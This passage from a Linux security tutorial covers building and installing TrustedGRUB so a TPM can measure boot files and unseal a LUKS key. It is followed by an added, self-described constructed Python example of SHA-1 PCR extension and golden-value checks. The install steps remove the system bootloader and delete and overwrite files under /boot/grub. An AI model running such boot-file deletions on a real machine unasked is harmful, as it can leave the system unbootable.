         PCR-09: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
         PCR-10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
         PCR-11: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
         PCR-12: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
         PCR-13: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
         PCR-14: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
         PCR-15: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
         PCR-16: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
         PCR-17: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
         PCR-18: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
         PCR-19: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
         PCR-20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
         PCR-21: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
         PCR-22: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
         PCR-23: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     First, we must download TrustedGRUB from the TrustedGRUB repository. To download TrustedGRUB, execute the commands below:

         # svn co https://projects.sirrix.com/svn/trustedgrub/release/
         # mv release/ TrustedGRUB/
         # tar xvzf TrustedGRUB-1.1.5.tar.gz
         # cd TrustedGRUB-1.1.5/

     What follows is the compilation phase. We can configure and compile TrustedGRUB with the following command:

         # ./build_tgrub.sh
         - Deflating TrustedGRUB
         - Configuring TrustedGRUB
         - Compiling TrustedGRUB
         - done

         Please do
           'cp default /boot/grub'
           'cd TrustedGRUB-1.1.5'
           'make install'

         To install TrustedGRUB to your local hard disc do:

           'rm -rf /boot/grub/stage*'
           'rm -rf /boot/grub/*1_5'
           'cp default /boot/grub'
           'cd TrustedGRUB-1.1.5'
           'cp stage1/stage1 /boot/grub'
           'cp stage2/stage2 /boot/grub'
           './grub/grub --no-floppy'
         Then enter:
           root (hdX,Y)
           setup (hdX)
           quit

         or alternatively
           'rm -rf /boot/grub/stage*'
           'rm -rf /boot/grub/*1_5'
           './TrustedGRUB-1.1.5/util/grub-install /dev/XXX --no-floppy'

     We can see that TrustedGRUB was successfully configured and compiled. To replace our old GRUB with the new TrustedGRUB, we need to remove the old GRUB from the system and install the new TrustedGRUB. We can do that by issuing the commands below:

         # emerge -C grub
         # cd TrustedGRUB-1.1.5/
         # make install

     The first command removes the system GRUB, while make install installs the new TrustedGRUB. Afterwards we need to copy some files needed for the boot process to the /boot partition. First we make a backup of the old /boot partition, and afterwards overwrite some files with new ones. Let's create the backup:

         # cp -r /boot /boot2

     And copy some of the files from TrustedGRUB to the /boot partition (the old files are still there, so we overwrite them):

         # cp ../default /boot/grub/
         # cp stage1/stage1 /boot/grub
         # cp stage2/stage2 /boot/grub

     The only thing left is to actually install grub, which can be done from the grub shell:

         # grub
         grub> root (hd0,0)
         grub> setup (hd0)
         grub> quit

     Then we can restart the system to see if everything works as expected. If the system boots normally, then everything is ok. Since the TPM doesn't do anything by itself, but requires software that supports the TPM to control it, it goes without saying that we must configure TrustedGRUB to use the TPM. TrustedGRUB supports additional functionality: the checkfile and the pcr_verify options. The checkfile option allows us to specify the grub.conf file and additional files and programs to check at startup. GRUB will extend one of the PCR registers with the SHA1 of the specified files.

     3. Conclusion

     The TPM provides hardware support that holds the keys, which can be used to prove that the platform is trusted and that the operating system can be booted securely. We can use the TPM with LUKS in Linux, where the LUKS key is written into the TPM and a TrustedGRUB is set up which unlocks the sealed key. The /etc/crypttab in the initrd should retrieve the key from the TPM and boot the system securely, which is why we need to include tpm-tools in the initrd. We must also mention that LUKS is compatible with the TPM in Linux, whereas TrueCrypt still isn't. Not to mention that the Linux version of TrueCrypt doesn't even have the option to encrypt the whole partition, while LUKS is a champion at doing that. Source: InfoSec Resources
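The article states that TrustedGRUB's checkfile option extends a PCR with the SHA1 of each listed file, and shows the sysfs pcrs listing used to read the registers back. The code below is an added example (not part of the article, TrustedGRUB or tpm-tools) that implements the TPM 1.2 extend rule PCR_new = SHA1(PCR_old || SHA1(file)), parses the pcrs format, and compares live values against a recorded known-good set; the pcrs excerpt reuses values quoted in the article, while the boot "files" and the golden set are constructed here.

```python
"""TPM 1.2 style PCR extend (SHA-1) as used by TrustedGRUB's checkfile, plus a
parser for /sys/class/misc/tpm0/device/pcrs and a golden-value comparison."""
import hashlib

def parse_pcrs(text):
    """Parse 'PCR-00: AD B5 ...' lines into {index: 20-byte value}."""
    pcrs = {}
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("PCR-"):
            continue
        label, _, hexbytes = line.partition(":")
        pcrs[int(label[4:])] = bytes.fromhex(hexbytes.replace(" ", ""))
    return pcrs

def extend(pcr, measurement):
    """PCR_new = SHA1(PCR_old || measurement); both inputs are 20-byte SHA-1 digests."""
    if len(pcr) != 20 or len(measurement) != 20:
        raise ValueError("PCR and measurement must be 20-byte SHA-1 digests")
    return hashlib.sha1(pcr + measurement).digest()

def measure_files(contents, start=bytes(20)):
    """Extend a PCR (all zeros after reset) with SHA1 of each file's content, in order.
    Order matters: the same files measured in a different sequence give a different PCR."""
    pcr = start
    for data in contents:
        pcr = extend(pcr, hashlib.sha1(data).digest())
    return pcr

def check_against_golden(current, golden):
    """Return the PCR indexes whose current value differs from the recorded good value."""
    return sorted(i for i, v in golden.items() if current.get(i) != v)

# Constructed excerpt in the sysfs format; PCR-00, PCR-04, PCR-08 and PCR-17 are the
# values quoted in the article's listing.
SAMPLE_PCRS = """\
PCR-00: AD B5 A1 6B F5 42 CA 9D 0F EA 7A 60 94 81 53 F8 E0 42 E6 B6
PCR-04: 47 0E D4 44 DE 46 2C FC 17 5E 3C 68 8D 79 A3 2B 97 30 DF 13
PCR-08: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
PCR-17: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
"""

# Constructed stand-ins for files a checkfile list might name (grub.conf, kernel, initrd).
BOOT_FILES = [b"default 0\ntimeout 5\n", b"\x7fELF-kernel-image", b"initramfs-bytes"]

def demo():
    """Compare a clean and a tampered PCR set, and show how file changes move the PCR."""
    golden = parse_pcrs(SAMPLE_PCRS)
    tampered = dict(golden)
    # Simulate one extra, unexpected measurement landing in PCR-04.
    tampered[4] = extend(golden[4], hashlib.sha1(b"unexpected module").digest())
    return {
        "clean": check_against_golden(golden, golden),
        "tampered": check_against_golden(tampered, golden),
        "boot_pcr": measure_files(BOOT_FILES),
        "boot_pcr_modified_kernel": measure_files(
            [BOOT_FILES[0], b"\x7fELF-evil-kernel", BOOT_FILES[2]]),
        "boot_pcr_reordered": measure_files(BOOT_FILES[::-1]),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value.hex() if isinstance(value, bytes) else value)
```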
  20. http://www.youtube.com/watch?v=pxJb-F0AN14&feature=player_embedded Source: YouTube